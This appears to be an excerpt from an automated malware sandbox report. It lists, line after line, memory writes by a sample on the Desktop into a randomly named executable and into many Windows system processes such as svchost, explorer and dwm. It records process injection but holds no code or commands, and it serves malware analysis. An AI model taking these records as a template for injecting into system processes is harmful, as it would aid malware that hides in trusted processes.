        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2160000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2AD0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2C20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 810000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 820000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2A60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2A70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1200000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1210000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: F50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: F60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 23B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2400000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: B80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: B90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 7D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 7E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2EC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2F10000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1150000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1160000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: D50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: D60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 25E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2640000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2D40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2D50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2B10000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2C60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 11E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 11F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 11D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 11E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 670000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 680000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 810000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 820000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 14A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 14B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 920000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ctfmon.exe base: 840000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\explorer.exe base: B780000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 330000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: A80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 670000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 1B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AD0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\smartscreen.exe base: 8E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: FC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: AF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 5E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 5C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: C10000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: C30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: B60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dllhost.exe base: D20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: BB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: FA0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: F70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 1F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dwm.exe base: 6C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\sihost.exe base: D80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 450000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 930000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ctfmon.exe base: 850000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\explorer.exe base: B790000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 340000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: A90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 680000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 1C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AE0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\smartscreen.exe base: 8F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: FD0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 200000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: B00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 5F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 5D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: C20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: C40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: B70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dllhost.exe base: D30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: BC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: FB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: F80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 200000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dwm.exe base: 6D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\sihost.exe base: D90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 460000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 940000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ctfmon.exe base: 860000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\explorer.exe base: B7A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 350000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: AA0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 690000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 1D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\smartscreen.exe base: 900000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: FE0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A10000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: B10000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 600000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 5E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\backgroundTaskHost.exe base: C30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: C50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: B80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dllhost.exe base: D40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: BD0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: FC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: F90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 210000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dwm.exe base: 6E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\sihost.exe base: DA0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 470000Jump to behavior
